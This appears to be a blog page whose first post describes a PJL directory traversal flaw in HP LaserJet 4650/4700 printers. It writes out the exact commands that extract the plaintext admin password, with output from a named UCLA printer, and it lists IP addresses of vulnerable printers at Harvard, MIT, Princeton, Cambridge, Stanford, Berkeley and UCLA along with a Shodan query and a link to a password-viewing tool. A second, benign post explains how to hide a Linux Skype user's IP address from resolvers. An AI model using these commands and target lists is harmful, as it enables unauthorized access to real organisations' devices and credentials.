Vulnerability in HP Color LaserJet 4650 and 4700 printers

Talking about cyber-security, the first thing coming to your mind might be personal computers or server racks, maybe surveillance cameras considering the NSA affair. At least, printers will probably not be the first thing you might think of. However, it is important to not neglect them.

Basics of PJL

PJL is an acronym for printer job language, a protocol developed by Hewlett Packard (HP) in order to provide a simple communication method between a host, usually a personal computer commanded to print a document, and the printer. Being running on port 9100 by default, PJL is not only restricted to HP printers but being used by other printer models as well. The language provides a set of commands, including file system commands to download and upload files remotely from and to the printing device.
A basic PJL session might look like this:

user@client:~$ telnet 192.168.178.100 9100
Trying 192.168.178.100...
Connected to 192.168.178.100.
Escape character is '^]'.
^[%-12345X@PJL
@PJL INFO ID
@PJL INFO ID
"Brother MFC-7840W:8C5-C17:Ver.L"

@PJL ECHO Hello World
@PJL ECHO Hello World

While the INFO command having the parameter ID requests the printer to reply with its model name and version, ECHO has the printer reply with the subsequent message Hello World. This is not too thrilling yet until you are playing around with the file system commands prefixed by FS*. For example, @PJL FSDIRLIST NAME=”0:\” ENTRY=0 COUNT=999 replies with a list of files located on volume 0:\. On most HP printers, this exposes some web server related files to curious eyes. However, what should not happen is that you can escape volume 0:\ by using a double-dot. But this is exactly what you can do and is called directory traversal attack. 0:\..\ reveals the parent directory of volume 0:\ and 0:\..\..\ is sufficient on most HP printers to get access to the root directory of the underlying Unix system.

Open file systems

Open printer file systems allow you to directly upload files to the printer’s web directory. Visit http://lks-350-375e-038-d.ls.berkeley.edu/hp/device/pjlexploit/PoC.html for a proof of concept. Although there is a protection against file system access, namely a 16-bit PJL password which has to be set via the PJL interface, it is too complicated for standard or even advanced users who would have to know the PJL specifications in order to set it up. Secondly, a 16-bit PJL password can be successfully brute-forced within hours.

Plain text passwords

Storing plain text passwords is a sin which you are only allowed to commit as an absolute security beginner. You may not practice this technique when you are an embedded systems developer for a company whose printers are shipped worldwide. However, this is exactly what HP developers have done. Since you have access to a large part of the Unix file system which only seems to be restricted by native file permissions, you are now allowed to download the file at 0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat using the PJL-command FSUPLOAD (PJL commands are named based on the perspective of the printer). Guess what this file consists of. If you read a null-terminated ASCII-string starting at position 0x0c, you will notice that this string contains the web interface administration password.
Just look at the following short PJL session which will fully exploit this vulnerability. This was a session to 164.67.135.16 at the University of Calfornia in Los Angeles and selected as an example because of the highly creative password choice.

^[%-12345X@PJL
@PJL FSUPLOAD NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16
password

Explore printers yourself

PJL ExplorerA web-based PJL exploring tool called PJL Explorer has been developed in order to allow easy graphical access to the printer file system. You can access it at http://blechschmidt.saarland/printers/. PJL Explorer allows you to browse the printer file system, upload and delete files. To find vulnerable printers, run the following search query using a free Shodan account: port:9100 hp.
The source code of the PJL Explorer is available on Github.

Universities of Harvard, Princeton and Cambridge affected

Harvard: 140.247.118.185, 140.247.92.198, 128.103.90.40
Massachusetts Institute of Technoloy: 18.115.2.89, 18.116.0.129
Princeton: 128.112.35.10, 128.112.112.112, 128.112.32.43
Cambridge: 131.111.168.138, 131.111.39.27
Stanford University: 171.67.204.34
University of California, Berkeley: 128.32.208.18, 128.32.19.225, 169.229.207.65
University of California, Los Angeles: 128.97.11.33, 164.67.135.16, 128.97.64.72

For legal reasons, passwords are not included in this blog post. To view a printer password, please click one of the above links in order to use the PJL Explorer in order to display the passwords.

View the vulnerability report which I have sent to Hewlett Packard. According to the reply of HP, two security bulletins have already been published, one in 2010 and another one in 2013.

Skype: Hide your IP address from resolvers on Linux

How to hide your IP address from Skype resolvers on Linux

On Windows, Skype offers an option called “Allow direct connections to contacts only” which prevents from being tracked by so-called Skype resolvers. Unfortunately, Linux does not offer such an option in its graphical user interface. However, there is a detailed description on the Skype community boards on how to enable this feature on Windows 8, which does not seem to have the option integrated into the GUI either. On Linux, it is possible to follow the instructions as well, replacing the corresponding file name by its Linux equivalent:

  1. Quit Skype
  2. Open a terminal and enter cd /home/{linux username}/.Skype/{skype name}/ (replace {linux username} with your Linux username and {skype name} with your skype name)
  3. Enter gedit config.xml in order to open the configuration file
  4. Find <Account> in the file using Ctrl+F
  5. Enter <PrivateSkypeMode>1</PrivateSkypeMode> after <Account>
  6. Save the file using Ctrl+S
  7. Restart Skype

If you successfully followed the described steps above, you will notice that Skype resolvers will not be able to resolve your IP address anymore. However, for contacts in your contact list this might still be possible using network packet inspectors like Wireshark.

Why you should not purchase Skype resolver blacklisting services

There are several reasons to not purchase blacklisting offered by several Skype resolving services.
Firstly, Skype resolvers violate your privacy and in order to protect yourself you should pay the operators. This is morally reprehensible and – in my opinion – close to blackmailing.
Secondly, many operators behind these services seem to be cybercriminals which have infected a various number of machines in order to run distributed denial of service attacks. It is not uncommon that after you have successfully resolved the IP address of a Skype user, you will be asked whether you wish to take the IP address down using some commercial “booter”. In most countries, this is illegal and therefore, the operators should not be supported.
Most importantly, if you have purchased the blacklisting service, this blacklisting only applies to the Skype resolver for which you have purchased it. If the IP address resolvement fails using one Skype resolver, a malicious attacker will just move on to the next one. And even if you would purchase blacklisting for all available Skype resolvers offering this service, which might not be all, I doubt you could afford it.
Furthermore, there are native methods, like the one described in this blog post, to prevent your IP being found by Skype resolvers – for free.